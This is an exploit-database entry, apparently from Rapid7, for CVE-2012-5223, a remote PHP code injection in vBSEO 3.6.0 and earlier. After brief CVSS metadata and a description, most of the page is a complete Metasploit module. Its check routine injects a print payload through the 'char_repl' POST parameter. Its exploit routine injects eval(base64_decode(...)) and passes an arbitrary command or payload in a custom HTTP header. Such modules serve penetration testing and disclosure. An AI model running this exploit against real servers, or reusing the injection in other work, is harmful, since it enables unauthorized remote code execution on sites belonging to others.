vBSEO proc_deutf() Remote PHP Code Injection

2012-01-3022:15:27

EgiX <[email protected]>

www.rapid7.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

This module exploits a vulnerability in the ‘proc_deutf()’ function defined in /includes/functions_vbseocp_abstract.php for vBSEO versions 3.6.0 and earlier. User input passed through ‘char_repl’ POST parameter isn’t properly sanitized before being used in a call to preg_replace() function which uses the ‘e’ modifier. This can be exploited to inject and execute arbitrary code leveraging the PHP’s complex curly syntax.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBSEO proc_deutf() Remote PHP Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in the 'proc_deutf()' function
        defined in /includes/functions_vbseocp_abstract.php for vBSEO versions
        3.6.0 and earlier. User input passed through 'char_repl' POST parameter
        isn't properly sanitized before being used in a call to preg_replace()
        function which uses the 'e' modifier. This can be exploited to inject
        and execute arbitrary code leveraging the PHP's complex curly syntax.
      },
      'Author'         => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5223'],
          ['OSVDB', '78508'],
          ['BID', '51647'],
          ['EDB', '18424']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 8190,
          'Keys'        => ['php'],
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2012-01-23',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
        OptString.new('CMD', [false, "Command to execute"])
      ])
  end

  def check
    flag = rand_text_alpha(rand(10)+10)
    data = "char_repl='{${print(#{flag})}}'=>"

    uri = normalize_uri(datastore['URI'], 'vbseocp.php')

    response = send_request_cgi({
      'method' => "POST",
      'uri'    => uri,
      'data'   => data
    })

    if response.code == 200 and response.body =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    if datastore['CMD']
      p = "passthru(\"%s\");" % datastore['CMD']
      p = Rex::Text.encode_base64(p)
    else
      p = Rex::Text.encode_base64(payload.encoded)
    end

    data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"

    uri = normalize_uri(datastore['URI'], 'vbseocp.php')

    response = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'data' => data,
      'headers' => { 'Code' => p }
    })

    vprint_status("Server replied with #{response ? response.code : "nothing"}")
  end
end